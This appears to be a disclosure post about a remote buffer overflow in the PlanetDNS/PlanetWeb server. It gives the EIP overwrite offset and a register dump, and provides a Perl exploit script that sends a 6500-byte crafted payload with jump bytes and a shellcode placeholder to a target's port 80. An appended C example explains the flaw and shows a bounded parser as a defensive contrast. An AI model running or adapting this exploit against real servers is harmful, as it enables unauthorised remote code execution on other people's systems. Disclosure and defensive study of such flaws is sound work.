Hi,

PlanetDNS (http://www.planetdns.net) is a commercial software package that allows you to turn a computer into an Internet server: you can create an Internet name and connect to a web server, FTP server, mail server, etc. running on your computer.

PlanetDNS is vulnerable to a buffer overflow with an overwrite of EIP (never posted before). It was already reported that a buffer of 1024 bytes could crash the server; I found that sending a buffer of 6500 bytes (without GET /) overwrites EIP and thus allows execution of a shellcode. The overwrite is done with bytes 6449, 6450, 6451, 6452. One also notices that EBX always points 4 bytes before EIP, so the return address will be a jmp ebx or call ebx, which can be found in many loaded modules.

I wrote an exploit, tested on PlanetWeb v1.14, which gives the following register state:

Access violation - code c0000005 (first chance)
eax=0217dfb0 ebx=0217ffdc ecx=41414141 edx=7846f5b5 esi=0217dfd8 edi=00000000
eip=41414141 esp=0217df18 ebp=0217df38 iopl=0         nv up ei pl zr na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
43434343 ??              ???

Exploit code:

#!/usr/bin/perl -w
# tool bop.pl
# buffer overflow tested against PlanetWeb v1.14
# humm..this exploit is not for lamers...
# Greetz: marocit and #crack.fr (especially christal... the less hard you pedal,
# the less fast you go..)
#
use IO::Socket;

if ($#ARGV < 0) {
    print "\n write the target IP!! \n\n";
    exit;
}

$shellcode = ("YOURFAVORITSHELLCODEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); # add your favorite shellcode
$buffer    = "A" x 6444;
$ebx       = "\x90\xEB\x08\x90";  # you have the chance because ebx = eip - 4 bytes: jmp short +8
$ret       = "\x43\x43\x43\x43";  # insert your ret address (jmp ebx or call ebx)
$minibuf   = "\x90\x90\x90\x90";  # will be jumped over by EB08
$connect   = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ARGV[0]", PeerPort => "80");
unless ($connect) { die "cant connect $ARGV[0]" }
print $connect "$buffer$ebx$ret$minibuf$shellcode";
print "\nsending exploit......\n\n";
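As an added defensive illustration (this is not PlanetDNS/PlanetWeb code, which is closed-source; the buffer size LINE_MAX, the status values and the method list are assumptions), the following shows the fixed-size request-line copy pattern that produces a register state like the one above, beside a bounded parser that rejects the 1024- and 6500-byte inputs the report describes before they reach the stack buffer:

```c
/* Added example, not the vendor's code. Contrasts an unbounded request-line copy
 * with a length-checked parser. LINE_MAX, the status enum and the accepted
 * method set are assumptions chosen for illustration. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define LINE_MAX 4096   /* assumed fixed-size request-line buffer */

enum req_status { REQ_OK = 0, REQ_TOO_LONG = 1, REQ_BAD_METHOD = 2 };

/* Vulnerable pattern: unbounded copy of network data into a stack buffer.
 * A line longer than LINE_MAX runs past 'line' into the saved registers and
 * the return address, which is how a dump ends up with eip=41414141.
 * Kept only to name the defect; never feed it untrusted input. */
size_t copy_line_unsafe(const char *req)
{
    char line[LINE_MAX];
    strcpy(line, req);            /* no length check at all */
    return strlen(line);
}

/* Hardened pattern: check the length before any copy, terminate explicitly,
 * and require a recognised method token (the report's crash input carried no
 * "GET /" at all). The caller maps the status to an HTTP error reply. */
int parse_request_line(const char *req, size_t req_len,
                       char *method_out, size_t method_cap)
{
    static const char *const methods[] = { "GET", "HEAD", "POST" }; /* assumed set */
    char line[LINE_MAX];
    const char *sp;
    size_t mlen, i;

    if (req_len >= sizeof line)   /* reject before touching the stack buffer */
        return REQ_TOO_LONG;
    memcpy(line, req, req_len);
    line[req_len] = '\0';

    /* The method is the token before the first space. */
    sp = memchr(line, ' ', req_len);
    mlen = sp ? (size_t)(sp - line) : req_len;
    for (i = 0; i < sizeof methods / sizeof methods[0]; i++) {
        if (strlen(methods[i]) == mlen && memcmp(line, methods[i], mlen) == 0) {
            if (method_out && method_cap > mlen) {
                memcpy(method_out, line, mlen);
                method_out[mlen] = '\0';
            }
            return REQ_OK;
        }
    }
    return REQ_BAD_METHOD;
}

/* Builds a constructed line of n 'A' bytes, like the 1024- and 6500-byte
 * buffers described in the report, and returns how the parser classifies it. */
int classify_filler_line(size_t n)
{
    char *buf = malloc(n);
    int status;
    if (!buf)
        return -1;
    memset(buf, 'A', n);
    status = parse_request_line(buf, n, NULL, 0);
    free(buf);
    return status;
}

int main(void)
{
    char method[8];
    printf("6500 x 'A' -> status %d (1 = too long)\n", classify_filler_line(6500));
    printf("1024 x 'A' -> status %d (2 = bad method)\n", classify_filler_line(1024));
    if (parse_request_line("GET / HTTP/1.0", strlen("GET / HTTP/1.0"),
                           method, sizeof method) == REQ_OK)
        printf("valid line -> method %s\n", method);
    return 0;
}
```

The length check runs on the count of bytes received, not on a string the attacker terminates, and the copy uses that checked count; the unsafe variant trusts the peer to stop at the buffer size, which is exactly what the 6500-byte probe disproves.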